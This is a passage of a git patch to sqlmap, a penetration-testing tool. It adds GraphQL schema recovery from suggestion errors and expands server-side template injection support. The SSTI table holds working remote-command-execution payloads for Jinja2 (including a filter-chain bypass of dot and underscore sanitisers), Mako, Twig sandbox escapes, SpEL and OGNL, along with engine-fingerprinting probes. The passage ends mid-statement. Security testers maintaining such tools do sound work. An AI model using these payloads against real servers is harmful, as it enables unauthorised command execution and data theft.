From 7b60bc828486a3ae63c8cfc0da4da97926c8a1c6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Miroslav=20=C5=A0tampar?= Date: Mon, 29 Jun 2026 22:20:22 +0200 Subject: [PATCH] Minor improvements --- data/txt/sha256sums.txt | 20 +-- extra/vulnserver/vulnserver.py | 6 +- lib/core/settings.py | 15 ++- lib/techniques/graphql/inject.py | 129 ++++++++++++++++--- lib/techniques/ldap/inject.py | 14 +-- lib/techniques/nosql/inject.py | 8 +- lib/techniques/ssti/inject.py | 205 +++++++++++++++++++++++++------ lib/techniques/xpath/inject.py | 85 +++++++++++-- tests/test_graphql.py | 62 ++++++++++ tests/test_ssti.py | 148 +++++++++++++++++++++- tests/test_xpath.py | 38 +++++- 11 files changed, 626 insertions(+), 104 deletions(-) diff --git a/data/txt/sha256sums.txt b/data/txt/sha256sums.txt index 4963f8673..275b80db6 100644 --- a/data/txt/sha256sums.txt +++ b/data/txt/sha256sums.txt @@ -160,7 +160,7 @@ ca86d61d3349ed2d94a6b164d4648cff9701199b5e32378c3f40fca0f517b128 extra/shutils/ df768bcb9838dc6c46dab9b4a877056cb4742bd6cfaaf438c4a3712c5cc0d264 extra/shutils/recloak.sh 1972990a67caf2d0231eacf60e211acf545d9d0beeb3c145a49ba33d5d491b3f extra/shutils/strip.sh 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 extra/vulnserver/__init__.py -f96ceae5ecb2bfe5eb3b8ae5cf344a93943f13322bc79bb92dbaeafa30f9321f extra/vulnserver/vulnserver.py +617cec1b731e0baacafa6f58c2f56a85b6128d1416627cc1b2f61519c8539a2e extra/vulnserver/vulnserver.py a2bf70d7f87c3a4e0675c0bad54119a4e04efa6ea2730a8338d5aebcd995630e lib/controller/action.py 9137a8f7368496c84b21944f6b94c28004d3a2a849ac9c8e0b20e294e4c4a93a lib/controller/checks.py 4598de22ed3df63432e9643ba48533a01bec9f0b253c3a11f322ccedaef353f0 lib/controller/controller.py @@ -189,7 +189,7 @@ e033b20a0f7821797a10f4bf4235723f38c7db551c611fbb713faa621b123c4a lib/core/optio 9bf174058f15d14e24e94f9aaf42df045119d3617c6c54bd2f3af79b462f331d lib/core/replication.py 0b8c38a01bb01f843d94a6c5f2075ee47520d0c4aa799cecea9c3e2c5a4a23a6 lib/core/revision.py 888daba83fd4a34e9503fe21f01fef4cc730e5cde871b1d40e15d4cbc847d56c lib/core/session.py -7f811ed56c2ce56e2575e732d0853a2064cefa57fa850c51b9e08e00d685ca08 lib/core/settings.py +7461f9959d80cade863d9ee2f9aa30a2a5ac054f0913357c796f1282ec346a9f lib/core/settings.py c7804223319e18eb0b8e2cbf0a8b6896d1cefb7b0b1a2e9f1cf826a8a3b56750 lib/core/shell.py a2e98a94b231432736d6b304fc75525c8b5fdb4768c418387c5b4c1a610dad64 lib/core/subprocessng.py 19f1e3c5e3ba703d28d510cd7a9ab8284d5fbe9df5ce7e77c86e5931571364b7 lib/core/target.py @@ -240,19 +240,19 @@ a66a4b9df6207dce722c9b71d290ea426723cb4b697b416065dc7dd5db96fe8e lib/techniques 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/error/__init__.py 5bbef46c16e34fd80e3f9f0e9aa255ce2e39be0d0e57479e25890b041c7efc7d lib/techniques/error/use.py 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/graphql/__init__.py -ffbc7583a563bb9fe5a560ca8363f3e4ec84ecf907b956883ab1f2904f19d529 lib/techniques/graphql/inject.py +c3e5cf7e5e35ae5fd86b63a515b37e6f06e61c70d2690252f2ee8373aa16637e lib/techniques/graphql/inject.py 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/__init__.py 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/ldap/__init__.py -cc90c641d74244e45fa0c8c4026315452137e66b6fb5cef681d0eacd4e11eb69 lib/techniques/ldap/inject.py +039d64a610b0e92e953fa6eaa740e7c2867e34e12b82e0113204e8f6100dc368 lib/techniques/ldap/inject.py 44401cad3e39ae9fb899ed5d0e2fdd0879561de05c3117f17f3b0db54f4e3724 lib/techniques/nosql/__init__.py -e2cd2b19f82393f9bbc8f374686cd851a4ccc264bb898ea54547ec479a05674c lib/techniques/nosql/inject.py +e465d9cb6ac83dafe38aeec851856183b93f5aa19f628fb64371a290797e2518 lib/techniques/nosql/inject.py 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/ssti/__init__.py -cb8806c285962593b963464ba870d61f274ee73d9ba878c76fe52795cbe4eced lib/techniques/ssti/inject.py +29ab841b6129106f19db692a5a30f90a5e758d6cd24d47da0a35c8090910ae18 lib/techniques/ssti/inject.py 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/union/__init__.py ceec65f8cb7c3254c4671351c837418c76ac5bc55ccbc40779f67231b54d7085 lib/techniques/union/test.py c65766f71e285fc85cdf58e7448c4c1d015af2a9dbb44fa3b665a9f13362fbcc lib/techniques/union/use.py 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/xpath/__init__.py -ece1fca81148ccf3c5f13b6ad7fb64966cb1ebef245216eac5cb0dd2490989db lib/techniques/xpath/inject.py +c61816c9dba9f6cc2223aed1a923f95130979e5f0a88ec254ee667d955ed2734 lib/techniques/xpath/inject.py aeefb42ea0c68f72744bc1bfd7194ec1bc06480d8a7e23f4b8d3d23fbba2b014 lib/utils/api.py 442555ab85277aff7c9e0cf465ea5b0d28395c326f68363449b2d3941f4b6de2 lib/utils/brute.py da5bcbcda3f667582adf5db8c1b5d511b469ac61b55d387cec66de35720ed718 lib/utils/crawler.py @@ -615,7 +615,7 @@ bb6991260a994fcbe79e05febaa34affd5631d02299fbc626820addd5f6ea4f4 tests/test_err 26730151abea598f193131c5d64ef92b531941972f3d6236f9951c3116030b1c tests/test_filesystem.py 16fba97cba6afe8af11aa30bcc4266f53b00f2530161e010af10b51db1509703 tests/test_fingerprint.py 20844dfc758e99b2f757906c51ef32aca0f699283ec5aa629158d3dc0fd279ea tests/test_generic_takeover.py -bde97a4781c4ee84e0fe86f7a33206f114167eb14b704013ecf1c26b838193d7 tests/test_graphql.py +f1f38f8b8ca667caadcb027d1a20eb895be4ef0935511114db235e66903bb463 tests/test_graphql.py 50b71422ee91b9a4864f4d5ce6c9bdf169dc5f57ed1db05c152eb010c282136b tests/test_gui_helpers.py 92648f2fe81e22c5726b198bbbda14961cd4d3294a0d9139dcea808b324142ac tests/test_har.py 70919c6ee8fbb3d619873489c819fa37d9035beb2e9b658cc5aa531d86a40380 tests/test_hash_crack.py @@ -643,7 +643,7 @@ cec98d72992c0799229a780fa7f0d7f3fb01ec2d708187ce0e4a05c8612f291b tests/test_saf a1c6cda1e5b483f61e6a4f8ddd0b06a15ddaa3fd2119bfb9dbd9cc970d7a751d tests/test_settings_regex.py 29d0278e3718b0fee422d3f6bb85ca02560138d48cd76f9fe1f35ac19d96071b tests/test_sgmllib.py d3d991331096e16e5019de3d652e9fff92c09bd9f97c50b1c2c3ceb0ed49b17e tests/test_sqlparse.py -49c72cf40cfa78c573826ca1ab3ad11886e353158a31f15b29c6d71b0e561fcc tests/test_ssti.py +4a9409a070770cc6300ed2b0c954254273479252fa602ffd19d78917f895756c tests/test_ssti.py 8bcbf1091134dd0a62f6201f8b3645ed87b5ff2f7ba40a87231a29dac412591f tests/test_strings.py 8f1c5f0f337ecd26d35c5551060034e0aa33a62cce5385fc1227fdc485f6383e tests/test_tamper.py 67472bd71c20782cc0f738e2c2e674c29d6985669e14d15b69baef7d0e33de62 tests/test_target_parsing.py @@ -659,7 +659,7 @@ eca021208e388b4d14c53f1e9f8a6e7d685e54ba572fb2a8487e6b620a20bcb5 tests/test_use 2364db35025a53ea4e5a0a80c034997642785f7e6d1566d0d0f1db959fe3c82e tests/test_utils.py 93ef9944effc62d4f744c57bd643137c90fd92205c6a6cbe891e0e99efb80a7f tests/test_wafbypass.py 81bb6d7449f224fa337734ae361c1a340bf9a51768a854d6a1a6e718ed1263ca tests/test_wordlist.py -c7584cad4f99416e6415744412941f5a47b2f5284270326624bd291edf6d9994 tests/test_xpath.py +9c1c23a83408e6012e019e82ffb53e25e317054d1b28ca61a2c4fe830a472fcf tests/test_xpath.py 55eaefc664bd8598329d535370612351ec8443c52465f0a37172ea46a97c458a thirdparty/ansistrm/ansistrm.py e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/ansistrm/__init__.py f597b49ef445bfbfb8f98d1f1a08dcfe4810de5769c0abfab7cdce4eebbfcae7 thirdparty/beautifulsoup/beautifulsoup.py diff --git a/extra/vulnserver/vulnserver.py b/extra/vulnserver/vulnserver.py index 4dc32a3a4..f20c318eb 100644 --- a/extra/vulnserver/vulnserver.py +++ b/extra/vulnserver/vulnserver.py @@ -986,7 +986,7 @@ class ReqHandler(BaseHTTPRequestHandler): elements = root.xpath(xpath_expr) entries = [_xpath_element_to_dict(el) for el in elements] except Exception as ex: - error = "%s: %s" % (type(ex).__name__, getUnicode(ex)) + error = "%s: %s" % (type(ex).__name__, str(ex)) output = json.dumps({"entries": entries, "count": len(entries), "error": error}, default=str) self.wfile.write(output.encode(UNICODE_ENCODING)) @@ -1013,7 +1013,7 @@ class ReqHandler(BaseHTTPRequestHandler): if results: authenticated = True except Exception as ex: - error = "%s: %s" % (type(ex).__name__, getUnicode(ex)) + error = "%s: %s" % (type(ex).__name__, str(ex)) output = json.dumps({"authenticated": authenticated, "error": error}, default=str) self.wfile.write(output.encode(UNICODE_ENCODING)) @@ -1036,7 +1036,7 @@ class ReqHandler(BaseHTTPRequestHandler): output += template.render() except Exception as ex: # Leak template engine error for error-based detection - output += "%s: %s" % (type(ex).__name__, getUnicode(ex)) + output += "%s: %s" % (type(ex).__name__, str(ex)) else: output += "Hello" diff --git a/lib/core/settings.py b/lib/core/settings.py index d9df00f06..b156c4604 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -20,7 +20,7 @@ from lib.core.enums import OS from thirdparty import six # sqlmap version (...) -VERSION = "1.10.6.190" +VERSION = "1.10.6.191" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) @@ -878,7 +878,15 @@ NOSQL_MAX_RECORDS = 100 NOSQL_MAX_LENGTH = 1024 # GraphQL endpoint paths to probe when the user supplies a base URL with --graphql (no explicit /graphql) -GRAPHQL_ENDPOINT_PATHS = ("/graphql", "/api/graphql", "/v1/graphql", "/graphql/api", "/graph", "/gql") +GRAPHQL_ENDPOINT_PATHS = ("/graphql", "/api/graphql", "/v1/graphql", "/api/v1/graphql", "/graphql/api", "/graphql/console", "/graphql.php", "/graphiql", "/graph", "/gql", "/query") + +# Seed field/argument names used to recover a GraphQL schema from "Did you mean" suggestion error +# messages when introspection is disabled (the field-suggestion / "Clairvoyance" technique) +GRAPHQL_FIELD_WORDLIST = ("user", "users", "me", "search", "login", "node", "post", "posts", + "account", "accounts", "profile", "product", "products", "order", "orders", "item", "items", + "customer", "find", "get", "list", "comment", "comments", "message", "messages", "updateUser") +GRAPHQL_ARG_WORDLIST = ("id", "username", "user", "name", "term", "query", "q", "search", + "email", "input", "password", "key", "filter", "slug", "title", "uid") # Canonical GraphQL introspection query (the one everyone copy-pastes). Returned schema carries the # full type system: query/mutation/subscription roots, OBJECT/INPUT_OBJECT/ENUM/SCALAR types, their @@ -967,6 +975,9 @@ LDAP_CHAR_MAX = 0x7e # Upper bound for the value-length search during LDAP blind extraction LDAP_MAX_LENGTH = 256 +# Maximum number of directory entries enumerated during LDAP blind dumping +LDAP_MAX_RECORDS = 20 + # Attributes that definitively identify the backend vendor when probed on the RootDSE or # a well-known directory entry. Each tuple is (attribute, expected_value_substring, backend). LDAP_FINGERPRINT_ATTRIBUTES = ( diff --git a/lib/techniques/graphql/inject.py b/lib/techniques/graphql/inject.py index f56139d92..c058cd64b 100644 --- a/lib/techniques/graphql/inject.py +++ b/lib/techniques/graphql/inject.py @@ -22,8 +22,10 @@ from lib.core.data import logger from lib.core.enums import CUSTOM_LOGGING from lib.core.enums import POST_HINT from lib.core.settings import ERROR_PARSING_REGEXES +from lib.core.settings import GRAPHQL_ARG_WORDLIST from lib.core.settings import GRAPHQL_ENDPOINT_PATHS from lib.core.settings import GRAPHQL_ERROR_REGEX +from lib.core.settings import GRAPHQL_FIELD_WORDLIST from lib.core.settings import GRAPHQL_INTROSPECTION_QUERY from lib.core.settings import NOSQL_ERROR_REGEX from lib.core.settings import UPPER_RATIO_BOUND @@ -354,6 +356,90 @@ def _introspect(endpoint): return None +# --- Schema recovery via field suggestions (introspection disabled) --------- + +def _gqlErrors(page): + # GraphQL error-envelope messages as a list of strings + doc = _parseJSON(page) + if not isinstance(doc, dict): + return [] + return [getUnicode(e.get("message", "")) for e in (doc.get("errors") or []) if isinstance(e, dict)] + + +def _harvestSuggestions(message): + # Pull suggested identifiers out of a "Did you mean ..." GraphQL validation message, + # handling both single- and double-quoted phrasings ('a', 'b', or 'c' / "a" or "b") + idx = message.find("Did you mean") + if idx < 0: + return [] + return re.findall(r"""['"]([A-Za-z_][A-Za-z0-9_]*)['"]""", message[idx:]) + + +def _suggestFields(endpoint, op): + # Recover root field names for an operation via suggestion harvesting: probe a random + # (guaranteed-unknown) field to collect the closest matches, then confirm/expand using a + # seed wordlist. A seed that does NOT come back as "Cannot query field" is itself a real field. + prefix = "" if op == "query" else "mutation " + found = set() + probes = [randomStr(length=10, lowercase=True)] + list(GRAPHQL_FIELD_WORDLIST) + + for seed in probes: + page, _ = _gqlSend(endpoint, "%s{ %s }" % (prefix, seed)) + doc = _parseJSON(page) or {} + for entry in (doc.get("errors") or []): + message = getUnicode(entry.get("message", "")) if isinstance(entry, dict) else "" + if "Did you mean" in message and "on type" in message: + found.update(_harvestSuggestions(message)) + # a seeded name counts as a real field only if it actually resolved (appears in `data`); + # "no unknown-field error" alone is too weak (lenient servers accept anything) + data = doc.get("data") + if seed in GRAPHQL_FIELD_WORDLIST and isinstance(data, dict) and seed in data: + found.add(seed) + + return sorted(found) + + +def _suggestArgs(endpoint, op, field): + # Recover an argument name for `field` from an "Unknown argument ... Did you mean ..." message + prefix = "" if op == "query" else "mutation " + bogus = randomStr(length=10, lowercase=True) + page, _ = _gqlSend(endpoint, '%s{ %s(%s: 1) }' % (prefix, field, bogus)) + found = set() + for message in _gqlErrors(page): + if "Unknown argument" in message: + found.update(_harvestSuggestions(message)) + return sorted(found) + + +def _introspectViaSuggestions(endpoint): + # Fallback schema recovery when introspection is disabled but the server still leaks field/argument + # names through "Did you mean" validation errors. Builds best-effort Slots: known scalar arg types + # are unavailable here, so we default to the 'string' strategy (the most broadly injectable) and let + # the per-slot injection oracle confirm which (field, argument) pairs are actually vulnerable. + + probe = randomStr(length=10, lowercase=True) + page, _ = _gqlSend(endpoint, "{ %s }" % probe) + if not any("Did you mean" in m for m in _gqlErrors(page)): + return None + + logger.info("introspection is disabled; recovering the schema from field-suggestion errors") + + slots = [] + for op, parentName in (("query", "Query"), ("mutation", "Mutation")): + fields = _suggestFields(endpoint, op) + if not fields: + continue + logger.info("recovered %d %s field(s) via suggestions: %s" % ( + len(fields), op, ", ".join(fields))) + for field in fields: + args = _suggestArgs(endpoint, op, field) or list(GRAPHQL_ARG_WORDLIST) + for arg in args: + # returnSel="" renders as "{ __typename }" (valid on any OBJECT); strategy="string" + slots.append(Slot(op, parentName, field, [(arg, {}, None)], + arg, "string", "OBJECT", "", "")) + return slots or None + + # --- Schema walking --------------------------------------------------------- def _extractSlots(schema): @@ -1087,11 +1173,11 @@ def graphqlScan(): global SENTINEL SENTINEL = randomStr(length=10, lowercase=True) - infoMsg = "'--graphql' is self-contained: it discovers the GraphQL endpoint, " - infoMsg += "enumerates the schema, and injects SQL/NoSQL payloads into reachable " - infoMsg += "argument slots. SQL enumeration switches (e.g. --banner, --dbs, " - infoMsg += "--tables) are ignored" - logger.info(infoMsg) + debugMsg = "'--graphql' is self-contained: it discovers the GraphQL endpoint, " + debugMsg += "enumerates the schema, and injects SQL/NoSQL payloads into reachable " + debugMsg += "argument slots. SQL enumeration switches (e.g. --banner, --dbs, " + debugMsg += "--tables) are ignored" + logger.debug(debugMsg) url = conf.url.rstrip("/") if conf.url else "" @@ -1120,19 +1206,22 @@ def graphqlScan(): # 2. Schema introspection logger.info("introspecting the GraphQL schema") schema = _introspect(endpoint) - if not schema: - logger.error("introspection failed (disabled or the endpoint rejected the query)") - return - types = schema.get("types") or [] - logger.info("introspection returned %d types" % len(types)) - - # 3. Slot enumeration - slots = _extractSlots(schema) - if not slots: - logger.warning("no injectable argument slots found in the schema") - _dumpSchema(schema, endpoint) - return + if schema: + types = schema.get("types") or [] + logger.info("introspection returned %d types" % len(types)) + slots = _extractSlots(schema) + if not slots: + logger.warning("no injectable argument slots found in the schema") + _dumpSchema(schema, endpoint) + return + else: + # Introspection blocked: try to recover the schema from field-suggestion errors + logger.warning("introspection failed (disabled or rejected); trying suggestion-based recovery") + slots = _introspectViaSuggestions(endpoint) + if not slots: + logger.error("could not recover the schema (introspection disabled and no field suggestions)") + return querySlots = [_ for _ in slots if _.operation == "query"] mutationSlots = [_ for _ in slots if _.operation == "mutation"] @@ -1141,8 +1230,10 @@ def graphqlScan(): len(slots), len(querySlots), len(mutationSlots))) # 4. Schema dump (before detection -- matches regular sqlmap table/column - # enumeration preceding data retrieval) - _dumpSchema(schema, endpoint) + # enumeration preceding data retrieval). Only when introspection succeeded; the + # suggestion-recovered path has no full schema document to render. + if schema: + _dumpSchema(schema, endpoint) if mutationSlots: names = sorted(set("%s(%s:)" % (_.fieldName, _.targetArg) for _ in mutationSlots)) diff --git a/lib/techniques/ldap/inject.py b/lib/techniques/ldap/inject.py index 446a4ce8f..eb1ef1f18 100644 --- a/lib/techniques/ldap/inject.py +++ b/lib/techniques/ldap/inject.py @@ -24,15 +24,11 @@ from lib.core.settings import LDAP_ERROR_REGEX from lib.core.settings import LDAP_ERROR_SIGNATURES from lib.core.settings import LDAP_FINGERPRINT_ATTRIBUTES from lib.core.settings import LDAP_MAX_LENGTH +from lib.core.settings import LDAP_MAX_RECORDS from lib.core.settings import UPPER_RATIO_BOUND from lib.request.connect import Connect as Request from lib.utils.xrange import xrange -try: - from lib.core.settings import LDAP_MAX_RECORDS -except ImportError: - LDAP_MAX_RECORDS = 20 - SENTINEL = randomStr(length=10, lowercase=True) @@ -644,10 +640,10 @@ def ldapScan(): global SENTINEL SENTINEL = randomStr(length=10, lowercase=True) - infoMsg = "'--ldap' is self-contained: it detects LDAP injection in HTTP " - infoMsg += "parameters and dumps reachable directory entries. SQL enumeration " - infoMsg += "switches (--banner, --dbs, --tables, --users, --sql-query) are ignored" - logger.info(infoMsg) + debugMsg = "'--ldap' is self-contained: it detects LDAP injection in HTTP " + debugMsg += "parameters and dumps reachable directory entries. SQL enumeration " + debugMsg += "switches (--banner, --dbs, --tables, --users, --sql-query) are ignored" + logger.debug(debugMsg) if not conf.paramDict: logger.error("no request parameters to test (use --data, GET params, or similar)") diff --git a/lib/techniques/nosql/inject.py b/lib/techniques/nosql/inject.py index 9d4a22dae..0b262e318 100644 --- a/lib/techniques/nosql/inject.py +++ b/lib/techniques/nosql/inject.py @@ -684,10 +684,10 @@ def nosqlScan(): # NoSQL injection from an application-scoped point is confined to the back-end's single query # (one collection/label) - it confirms and dumps what that query can reach, with no analog to the # SQL database/table/user/banner enumeration, so those switches do not apply here - infoMsg = "'--nosql' is self-contained: it confirms the injection and dumps the reachable " - infoMsg += "collection/document. SQL enumeration switches (e.g. --banner, --dbs, --tables, " - infoMsg += "--users, --sql-query) do not map to a NoSQL back-end and are ignored" - logger.info(infoMsg) + debugMsg = "'--nosql' is self-contained: it confirms the injection and dumps the reachable " + debugMsg += "collection/document. SQL enumeration switches (e.g. --banner, --dbs, --tables, " + debugMsg += "--users, --sql-query) do not map to a NoSQL back-end and are ignored" + logger.debug(debugMsg) tested = found = 0 diff --git a/lib/techniques/ssti/inject.py b/lib/techniques/ssti/inject.py index cfcb12f17..93251af7e 100644 --- a/lib/techniques/ssti/inject.py +++ b/lib/techniques/ssti/inject.py @@ -53,7 +53,23 @@ Engine = namedtuple("Engine", ( def _arithmeticPayload(fmt, a, b): - return fmt % (a, b) + # Substitute the two operands into the first two %d tokens by literal replacement rather than + # %-formatting: some engines' delimiters contain a literal '%' (e.g. ERB '<%= ... %>'), where + # fmt % (a, b) raises ValueError and would silently disable arithmetic detection for them. + return fmt.replace("%d", str(a), 1).replace("%d", str(b), 1) + + +def _expressionPayload(fmt, value): + # Same rationale as _arithmeticPayload(): literal %s substitution so '%'-delimited engines + # (notably ERB) can wrap expressions instead of crashing on fmt % value. + return fmt.replace("%s", value, 1) + + +def _degroup(text): + # Strip digit-group (thousands) separators so an arithmetic result still matches when the + # engine formats large numbers with grouping (e.g. FreeMarker renders 234*567 as "132,678"). + # Only separators sitting between digits are removed, so ordinary text is untouched. + return re.sub(u"(?<=\\d)[,\u00a0\u202f\u2009']" + u"(?=\\d)", "", getUnicode(text)) _ENGINE_TABLE = ( @@ -66,10 +82,24 @@ _ENGINE_TABLE = ( "{{ True }}", "{{ False }}", "True", "False", None, None, # Jinja2/Twig distinguished by trueRendered ("True"/"False" vs "1"/"") "{{ %s }}", - # Jinja2: try multiple RCE paths in order (cycler -> config -> lipsum) + # Jinja2: try multiple RCE paths in order (cycler -> config -> lipsum -> attr()-chain). + # The last one is dot-/underscore-free (filters + \x5f-escaped dunders), bypassing + # sanitisers that block '.'/'_' (the CVE-2025-23211 Tandoor technique). (("{{ cycler.__init__.__globals__.os.popen('{CMD}').read() }}", "cycler.__globals__"), ("{{ config.from_envvar.__globals__.__builtins__.__import__('os').popen('{CMD}').read() }}", "config.from_envvar chain"), - ("{{ lipsum.__globals__.os.popen('{CMD}').read() }}", "lipsum.__globals__"))), + ("{{ lipsum.__globals__.os.popen('{CMD}').read() }}", "lipsum.__globals__"), + ("{{ cycler|attr('\\x5f\\x5finit\\x5f\\x5f')|attr('\\x5f\\x5fglobals\\x5f\\x5f')|attr('\\x5f\\x5fgetitem\\x5f\\x5f')('os')|attr('popen')('{CMD}')|attr('read')() }}", "attr() filter chain (dot/underscore-free)"))), + Engine("Mako", "python", + "${", "}", + r"(?i)(?:mako\.exceptions\.\w+|mako\.runtime|CompileException|SyntaxException)", + ("${", "${}", "<%", "<%!"), + "${%d*%d}", "", + "${True}", "${False}", "True", "False", + None, None, # capital True/False uniquely identifies Mako within the ${ } family (Freemarker/Spring render lowercase true/false) + "${%s}", + # Mako: popen captures output; self.module.runtime path needs no <%import%> preamble + (("${self.module.runtime.util.os.popen('{CMD}').read()}", "self.module.runtime.util.os.popen"), + ("<%import os%>${os.popen('{CMD}').read()}", "import os + popen"))), # -- PHP ---------------------------------------------------------------------------------------------- Engine("Twig", "php", "{{", "}}", @@ -77,20 +107,29 @@ _ENGINE_TABLE = ( ("{{", "{{ }}", "{{ unknown|filter }}"), "{{ %d*%d }}", "{{ (%d*%d)|raw }}", "{{ true }}", "{{ false }}", "1", "", - "{{ _self }}", "Twig_Template", + # '_self' renders 'Twig_Template' (Twig 1) or '__string_template__...' (Twig 2/3); + # 'emplate' is the substring common to both, so the probe is version-stable + "{{ _self }}", "emplate", "{{ %s }}", - # Twig: try system -> exec -> shell_exec fallbacks + # Twig: filter() chain first; then sort()/map() callbacks, which double as classic + # sandbox escapes when 'filter' is not on the policy allow-list (DEEP1 Phishtale) (("{{ ['{CMD}']|filter('system') }}", "filter('system')"), ("{{ ['{CMD}']|filter('exec') }}", "filter('exec')"), - ("{{ ['{CMD}']|filter('shell_exec') }}", "filter('shell_exec')"))), + ("{{ ['{CMD}']|filter('shell_exec') }}", "filter('shell_exec')"), + ("{{ ['{CMD}', '']|sort('system')|join }}", "sort('system') sandbox escape"), + ("{{ ['{CMD}']|map('system')|join }}", "map('system') sandbox escape"))), # -- Java --------------------------------------------------------------------------------------------- Engine("Freemarker", "java", "${", "}", r"(?i)(?:freemarker\.(?:core|template|extract|cache)\.\w+|ParseException|InvalidReferenceException|TemplateException)", ("${", "${}", "<#if ", "<#--"), "${%d*%d}", "${(%d*%d)?no_esc}", - "${true}", "${false}", "true", "false", - "<#-- freemarker -->", "", + # modern FreeMarker errors on a bare ${true} ("boolean_format"); ?c gives the + # computer-format "true"/"false" string, so the boolean oracle works on real FreeMarker + "${true?c}", "${false?c}", "true", "false", + # Freemarker '?builtin' syntax (SpEL/Thymeleaf can't parse '?upper_case' -> errors there), + # giving an intrinsic, non-empty discriminator from Spring within the shared '${ }' family + '${"sstimark"?upper_case}', "SSTIMARK", "${%s}", # Freemarker: classic -> indirect-assign fallback (("${'freemarker.template.utility.Execute'?new()('{CMD}')}", "Execute?new"), @@ -118,9 +157,15 @@ _ENGINE_TABLE = ( ("${", "${}", "#{", "*{"), "${%d*%d}", "", "${true}", "${false}", "true", "false", - "${#request}", "", + # SpEL Java method call (Freemarker uses '?upper_case', not '.toUpperCase()' -> errors + # there), giving an intrinsic, non-empty discriminator from Freemarker in '${ }' + "${'sstimark'.toUpperCase()}", "SSTIMARK", "${%s}", - (("${T(java.lang.Runtime).getRuntime().exec('{CMD}')}", "T(Runtime).exec"),)), + # SpEL: read the process stdout (so output is captured, not just a Process object); + # then a blind exec; then the OGNL form for engines that parse OGNL instead of SpEL + (("${new java.io.BufferedReader(new java.io.InputStreamReader(T(java.lang.Runtime).getRuntime().exec('{CMD}').getInputStream())).readLine()}", "SpEL readLine (output)"), + ("${T(java.lang.Runtime).getRuntime().exec('{CMD}')}", "T(Runtime).exec (blind)"), + ("${(#rt=@java.lang.Runtime@getRuntime()).exec('{CMD}')}", "OGNL @Runtime@getRuntime (blind)"))), # -- Ruby --------------------------------------------------------------------------------------------- Engine("ERB", "ruby", "<%=", "%>", @@ -302,8 +347,12 @@ def _probeArithmetic(place, parameter, engine): if p1 in text1 or p2 in text2: continue + # Match against a digit-group-stripped copy so a grouped result (e.g. FreeMarker's + # "132,678") still counts; the raw-reflection check above stays on the original text. + norm1, norm2 = _degroup(text1), _degroup(text2) + # Each result must appear in its own response and NOT in the other - if result1 in text1 and result2 not in text1 and result2 in text2 and result1 not in text2: + if result1 in norm1 and result2 not in norm1 and result2 in norm2 and result1 not in norm2: return True return False @@ -326,6 +375,43 @@ def _probeError(place, parameter, engine): return None +# A divide-by-zero error is language-family specific, which separates engines that SHARE a +# delimiter but run on different runtimes (Jinja2/Python vs Twig/PHP in '{{ }}', or Mako/Python +# vs Freemarker/Spring/Java in '${ }'). Matching is case-SENSITIVE so Python's lowercase +# 'division by zero' is not confused with PHP's capitalised 'Division by zero'. JS is omitted on +# purpose: 1/0 yields Infinity there rather than an error, so it carries no family signal. +_FAMILY_DIVZERO = ( + ("python", re.compile(r"division by zero")), + ("ruby", re.compile(r"divided by 0")), + ("php", re.compile(r"DivisionByZeroError|Division by zero")), + ("java", re.compile(r"ArithmeticException|/ by zero")), +) + + +def _probeFamily(place, parameter, engine, cache): + """Inject a divide-by-zero inside the engine's delimiter and infer the backend language + family from the resulting error. Returns the family string or None. Responses are cached by + payload so engines that share a delimiter ('{{1/0}}' etc.) cost a single request.""" + + if not engine.arithmeticFmt or not engine.delimiterClose: + return None + + payload = (_originalValue(place, parameter) or "") + engine.delimiter + "1/0" + engine.delimiterClose + if payload not in cache: + cache[payload] = _send(place, parameter, payload) + page = cache[payload] + if not page: + return None + + text = getUnicode(page) + if payload in text: # raw reflection -> template did not execute it + return None + for family, regex in _FAMILY_DIVZERO: + if regex.search(text): + return family + return None + + def _probeDistinguishing(place, parameter, engine): """Send the engine-specific fingerprint probe and verify the response. For probes with a non-empty expected result, the result must appear and the @@ -391,17 +477,26 @@ def _booleanUniquelyIdentifies(engine): return count == 1 +def _familyUniquelyIdentifies(engine): + """Returns True when the engine's language family is unique among engines sharing the + same delimiter, so a divide-by-zero family probe is enough to name it exactly.""" + siblings = [e for e in _ENGINE_TABLE if e.delimiter == engine.delimiter] + return sum(e.family == engine.family for e in siblings) == 1 + + def _fingerprint(place, parameter): """Identify the template engine and confirm injection. Returns (engine, evidence) where evidence is a dict of detection results, or (None, None). - Scoring: arithmetic(3) + boolean(2) + error(1) + distinguishing(2). - Engines sharing delimiters require error, distinguishing, or unique boolean - rendering evidence to be named exactly; otherwise they are reported as family/probable.""" + Scoring: arithmetic(3) + boolean(2) + error(1) + distinguishing(2) + family(1). + Engines sharing delimiters require error, distinguishing, unique boolean rendering, or a + uniquely-identifying language family to be named exactly; otherwise they are reported as + family/probable.""" bestEngine = None bestEvidence = None bestScore = 0 + divZeroCache = {} for engine in _ENGINE_TABLE: evidence = {} @@ -429,6 +524,11 @@ def _fingerprint(place, parameter): evidence["distinguishing"] = True score += 2 + # Phase 5: language-family confirmation via divide-by-zero error class + if _probeFamily(place, parameter, engine, divZeroCache) == engine.family: + evidence["family"] = True + score += 1 + if score > bestScore: bestScore = score bestEngine = engine @@ -440,12 +540,13 @@ def _fingerprint(place, parameter): # or boolean rendering is unique within the delimiter family. _FAMILY = { "{{": "Jinja2/Twig/Handlebars-like", - "${": "Freemarker/SpringEL-like", + "${": "Freemarker/SpringEL/Mako-like", } if bestEngine.delimiter in _FAMILY: if (bestEvidence.get("error") or bestEvidence.get("distinguishing") or 